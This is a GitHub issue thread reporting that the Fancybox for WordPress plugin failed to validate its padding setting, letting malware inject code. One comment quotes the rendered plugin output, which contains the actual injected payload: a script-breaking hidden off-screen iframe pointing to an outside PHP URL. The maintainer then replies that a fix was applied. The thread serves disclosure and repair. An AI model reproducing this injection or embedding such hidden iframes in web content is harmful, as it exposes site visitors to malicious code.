### ISSUE TITLE
Validate settings input to prevent malware exploit.

### ISSUE THREAD

**Issue by Marcoaferrer** [moskis/fancybox-for-wordpress#23]
The padding field in the settings for the plugin is not validated. Some how malware got on my site and set the value of the field to a script tag. When my site would load the script tag would get included in the sites header and load malicious js. Just a suggestion to validate the settings input.

**Comment by maxadolfsson** [comment]
+1. Here's what I found, and please note the `<iframe>` which has been inserted instead of the padding value:

```html
<!-- Fancybox for WordPress -->
<script type="text/javascript">
jQuery(function(){

jQuery.fn.getTitle = function() { // Copy the title of every IMG tag and add it to its parent A so that fancybox can show titles
    var arr = jQuery("a.fancybox");
    jQuery.each(arr, function() {
        var title = jQuery(this).children("img").attr("title");
        jQuery(this).attr('title',title);
    })
}

// Supported file extensions
var thumbnails = jQuery("a:has(img)").not(".nolightbox").filter( function() { return /\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr('href')) });

jQuery("a.fancybox").fancybox({
    'cyclic': false,
    'autoScale': false,
    'padding': </script><iframe src="http://tusseyskiteam.com/wp-admin/js/bbcode.php" width="332" height="22" style="position:absolute;left:-88103px;"></iframe><script>,
    'opacity': false,
    'speedIn': ,
    'speedOut': ,
    'changeSpeed': ,
    'overlayShow': false,
    'overlayOpacity': "",
    'overlayColor': "",
    'titleShow': false,
    'titlePosition': '',
    'enableEscapeButton': false,
    'showCloseButton': false,
    'showNavArrows': false,
    'hideOnOverlayClick': false,
    'hideOnContentClick': false,
    'width': ,
    'height': ,
    'transitionIn': "",
    'transitionOut': "",
    'centerOnScroll': false
});

})
</script>
<!-- END Fancybox for WordPress -->
```

That's not nice!

:skull:

**Comment by moskis** [comment]
Hi,

Sorry about the issue, this was found and fixed in the WP plugin repository but i didn't remember there was a version of the plugin in github, Should you want more info about the info please check: https://wordpress.org/plugins/fancybox-for-wordpress/faq/

A fix (9c7283394bffadd40de1643e021fef869fa9787b) has been applied to the github version of the plugin. Also please note the code of the plugin on Github is a development branch that never made it into production, and differs substantially from the code on the WordPress repository. After updating the plugin make sure to check the plugin's settings to make sure the code is gone, or revert them to their defaults.

Development on the plugin has been inactive for the last 2 years approximately meaning no new features are planned for now, but bugs fixes will still be provided on the WP repository.

**Comment by maxadolfsson** [comment]
Thanks @moskis!
